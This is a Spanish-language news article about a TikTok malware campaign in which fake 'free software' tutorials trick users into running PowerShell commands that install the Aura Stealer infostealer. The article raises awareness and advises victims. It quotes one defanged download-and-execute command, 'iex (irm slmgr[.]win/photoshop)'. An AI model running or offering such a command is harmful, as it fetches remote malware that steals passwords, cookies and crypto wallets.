Una nueva campaña maliciosa fue detectada en TikTok, donde se comparten falsos tutoriales para obtener Windows, Netflix o Photoshop de forma gratuita. Sin embargo, estos videos son una trampa para distribuir malware y robar información personal, según descubrió el experto Xavier Mertens del SANS Internet Storm Center (ISC).
Los atacantes aprovechan la popularidad de esta plataforma de entretenimiento para lanzar estos engaños. Con videos breves y explicaciones sencillas, prometen acceso gratuito a programas y servicios, pero en realidad inducen a las víctimas a ejecutar comandos maliciosos que terminan comprometiendo sus dispositivos.
¿Cómo funciona este fraude en TikTok?
La campaña utiliza una técnica de ingeniería social llamada ClickFix, donde se ofrecen supuestas soluciones a problemas técnicos, según el análisis que se detectó e informó en el portal de Trend Micro desde mayo de este año.
Los usuarios son guiados a ejecutar comandos en PowerShell, la terminal de Windows, con la promesa de desbloquear funciones premium o instalar software completo sin pagar.
Por ejemplo, en un video sobre cómo activar Photoshop, se muestra un comando como: iex (irm slmgr[.]win/photoshop).
Este fragmento de código, lejos de hacer lo que promete, conecta al dispositivo con un servidor remoto para descargar y ejecutar nuevos scripts maliciosos.
¿Qué es lo que descargan estos scripts?
Según Bleeping Computer y el análisis de Mertens, el código descargado instala dos archivos ejecutables. El primero es una variante del malware Aura Stealer, especializado en robar información como:
- Contraseñas guardadas en navegadores
- Cookies de autenticación
- Billeteras de criptomonedas
El segundo ejecutable tiene la capacidad de compilar código bajo demanda, aunque aún se desconoce su objetivo final. Esto indica que el ataque podría escalar o adaptarse dependiendo del usuario afectado.
¿Por qué los criminales difunden sus ataques en TikTok?
TikTok se ha convertido en una fuente común para buscar soluciones rápidas, incluyendo trucos tecnológicos. Los ciberdelincuentes lo saben y lo usan como canal de distribución.
Estos videos engañosos se camuflan como tips útiles, lo que facilita que personas de todas las edades caigan en la trampa.
Leer: TODO LISTO PARA LA EXPOFER 2025: CHETUMAL RECIBIRÁ MÁS DE 200 MIL ASISTENTES
“Es una forma muy eficaz de ingeniería social. La confianza en los creadores y la simplicidad del contenido hace que la gente actúe sin sospechar”, explicó Mertens desde el ISC.
¿Qué hacer si caíste en los videos falsos?
Bleeping Computer advirtió que si un usuario sigue los pasos de estos videos, debe cambiar inmediatamente todas sus contraseñas, ya que sus credenciales podrían haber sido robadas. Esto incluye accesos a:
- Correo electrónico
- Redes sociales
- Bancos y billeteras digitales
- Plataformas como Netflix o Spotify
Además, se recomienda escanear el dispositivo con herramientas de seguridad actualizadas y desconectarlo de redes importantes si se detecta actividad sospechosa.
